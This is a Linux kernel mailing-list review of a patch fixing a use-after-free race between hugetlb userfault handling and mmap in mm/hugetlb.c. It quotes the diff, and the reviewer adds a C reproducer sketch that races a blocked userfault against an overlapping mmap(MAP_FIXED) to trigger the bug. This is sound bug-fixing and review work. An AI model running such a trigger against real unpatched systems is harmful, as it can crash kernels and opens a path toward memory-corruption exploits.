Date:   Wed, 21 Sep 2022 12:31:58 -0500
From:   Sidhartha Kumar <sidhartha.kumar@...cle.com>
To:     Liu Shixin <liushixin2@...wei.com>,
        Liu Zixian <liuzixian4@...wei.com>,
        Mike Kravetz <mike.kravetz@...cle.com>,
        Muchun Song <songmuchun@...edance.com>,
        Andrew Morton <akpm@...ux-foundation.org>
Cc:     linux-mm@...ck.org, linux-kernel@...r.kernel.org,
        Kefeng Wang <wangkefeng.wang@...wei.com>
Subject: Re: [PATCH] mm: hugetlb: fix UAF in hugetlb_handle_userfault



On 9/21/22 3:34 AM, Liu Shixin wrote:
> The vma_lock and hugetlb_fault_mutex are dropped before handling
> userfault and reacquired after handle_userfault() returns, but
> reacquiring the vma_lock can lead to a UAF[1] due to the following
> race:
>
> hugetlb_fault
>    hugetlb_no_page
>      /* unlock vma_lock */
>      hugetlb_handle_userfault
>        handle_userfault
>          /* unlock mm->mmap_lock */
>                                             vm_mmap_pgoff
>                                               do_mmap
>                                                 mmap_region
>                                                   munmap_vma_range
>                                                     /* clean old vma */
>          /* lock vma_lock again  <--- UAF */
>      /* unlock vma_lock */
>
> Since the vma_lock is unlocked again immediately after
> hugetlb_handle_userfault() returns, drop the unneeded relock and
> unlock inside hugetlb_handle_userfault() to fix the issue.
>
> [1] https://lore.kernel.org/linux-mm/20220921014457.1668-1-liuzixian4@huawei.com/
> Reported-by: Liu Zixian <liuzixian4@...wei.com>
> Signed-off-by: Liu Shixin <liushixin2@...wei.com>
> Signed-off-by: Kefeng Wang <wangkefeng.wang@...wei.com>
> ---
>   mm/hugetlb.c | 30 +++++++++++-------------------
>   1 file changed, 11 insertions(+), 19 deletions(-)
>
> diff --git a/mm/hugetlb.c b/mm/hugetlb.c
> index 9b8526d27c29..5a5d466692cf 100644
> --- a/mm/hugetlb.c
> +++ b/mm/hugetlb.c
> @@ -5489,7 +5489,6 @@ static inline vm_fault_t hugetlb_handle_userfault(struct vm_area_struct *vma,
>   						  unsigned long addr,
>   						  unsigned long reason)
>   {
> -	vm_fault_t ret;
>   	u32 hash;
>   	struct vm_fault vmf = {
>   		.vma = vma,
> @@ -5508,17 +5507,12 @@ static inline vm_fault_t hugetlb_handle_userfault(struct vm_area_struct *vma,
>   
>   	/*
>   	 * vma_lock and hugetlb_fault_mutex must be
> -	 * dropped before handling userfault.  Reacquire
> -	 * after handling fault to make calling code simpler.
> +	 * dropped before handling userfault.
>   	 */
>   	hugetlb_vma_unlock_read(vma);
>   	hash = hugetlb_fault_mutex_hash(mapping, idx);
>   	mutex_unlock(&hugetlb_fault_mutex_table[hash]);
> -	ret = handle_userfault(&vmf, reason);
> -	mutex_lock(&hugetlb_fault_mutex_table[hash]);
> -	hugetlb_vma_lock_read(vma);
> -
> -	return ret;
> +	return handle_userfault(&vmf, reason);
>   }
>   
>   static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
> @@ -5537,6 +5531,7 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   	unsigned long haddr = address & huge_page_mask(h);
>   	bool new_page, new_pagecache_page = false;
>   	bool reserve_alloc = false;
> +	u32 hash = hugetlb_fault_mutex_hash(mapping, idx);
>   
>   	/*
>   	 * Currently, we are forced to kill the process in the event the
> @@ -5547,7 +5542,7 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   	if (is_vma_resv_set(vma, HPAGE_RESV_UNMAPPED)) {
>   		pr_warn_ratelimited("PID %d killed due to inadequate hugepage pool\n",
>   			   current->pid);
> -		return ret;
> +		goto out;
>   	}
>   
>   	/*
> @@ -5561,12 +5556,10 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   		if (idx >= size)
>   			goto out;
>   		/* Check for page in userfault range */
> -		if (userfaultfd_missing(vma)) {
> -			ret = hugetlb_handle_userfault(vma, mapping, idx,
> +		if (userfaultfd_missing(vma))
> +			return hugetlb_handle_userfault(vma, mapping, idx,
>   						       flags, haddr, address,
>   						       VM_UFFD_MISSING);
> -			goto out;
> -		}
>   
>   		page = alloc_huge_page(vma, haddr, 0);
>   		if (IS_ERR(page)) {
> @@ -5634,10 +5627,9 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   		if (userfaultfd_minor(vma)) {
>   			unlock_page(page);
>   			put_page(page);
> -			ret = hugetlb_handle_userfault(vma, mapping, idx,
> +			return hugetlb_handle_userfault(vma, mapping, idx,
>   						       flags, haddr, address,
>   						       VM_UFFD_MINOR);
> -			goto out;
>   		}
>   	}
>   
> @@ -5695,6 +5687,8 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   
>   	unlock_page(page);
>   out:
> +	hugetlb_vma_unlock_read(vma);
> +	mutex_unlock(&hugetlb_fault_mutex_table[hash]);
>   	return ret;
>   
>   backout:
> @@ -5792,11 +5786,9 @@ vm_fault_t hugetlb_fault(struct mm_struct *mm, struct vm_area_struct *vma,
>   
>   	entry = huge_ptep_get(ptep);
>   	/* PTE markers should be handled the same way as none pte */
> -	if (huge_pte_none_mostly(entry)) {
> -		ret = hugetlb_no_page(mm, vma, mapping, idx, address, ptep,
> +	if (huge_pte_none_mostly(entry))
> +		return hugetlb_no_page(mm, vma, mapping, idx, address, ptep,
>   				      entry, flags);
> -		goto out_mutex;
> -	}
>   
>   	ret = 0;
>   

I've been looking at this as well.
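For reference, here is roughly how the window can be hit from
userspace. This is only a sketch written from the race diagram above,
not the reproducer behind the [1] link; it assumes preallocated 2MB
hugepages and userfaultfd support for hugetlb ranges:

/*
 * Rough sketch (assumed details, NOT the reproducer from [1]):
 * fault on a userfaultfd-registered hugetlb page in one thread while
 * another thread mmap(MAP_FIXED)s over the same range, replacing the
 * vma that the blocked fault still points to.
 *
 * Build: gcc -pthread repro.c
 * On an affected kernel this is expected to trip the UAF.
 */
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

#define HPAGE_SIZE	(2UL << 20)	/* assume 2MB hugepages */

static char *area;

static void *fault_thread(void *arg)
{
	/* Triggers hugetlb_no_page() -> hugetlb_handle_userfault();
	 * the thread parks in handle_userfault() with vma_lock,
	 * hugetlb_fault_mutex and mm->mmap_lock all dropped. */
	return (void *)(long)area[0];
}

int main(void)
{
	struct uffdio_api api = { .api = UFFD_API };
	struct uffdio_register reg;
	pthread_t t;
	long uffd;

	uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	if (uffd < 0 || ioctl(uffd, UFFDIO_API, &api))
		exit(1);

	area = mmap(NULL, HPAGE_SIZE, PROT_READ | PROT_WRITE,
		    MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB, -1, 0);
	if (area == MAP_FAILED)
		exit(1);

	reg.range.start = (unsigned long)area;
	reg.range.len = HPAGE_SIZE;
	reg.mode = UFFDIO_REGISTER_MODE_MISSING;
	if (ioctl(uffd, UFFDIO_REGISTER, &reg))
		exit(1);

	pthread_create(&t, NULL, fault_thread, NULL);
	sleep(1);	/* crude: let the fault block in handle_userfault() */

	/*
	 * vm_mmap_pgoff() -> do_mmap() -> mmap_region() unmaps and frees
	 * the old vma; when the pre-patch fault path relocks vma_lock,
	 * it dereferences freed memory.
	 */
	mmap(area, HPAGE_SIZE, PROT_READ | PROT_WRITE,
	     MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_HUGETLB, -1, 0);

	pthread_join(t, NULL);
	return 0;
}

The key point is visible in the diagram: handle_userfault() drops
mm->mmap_lock, so the second mmap() can proceed and free the old vma
while the fault is still parked.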
Reviewed-by: Sidhartha Kumar <sidhartha.kumar@...cle.com>
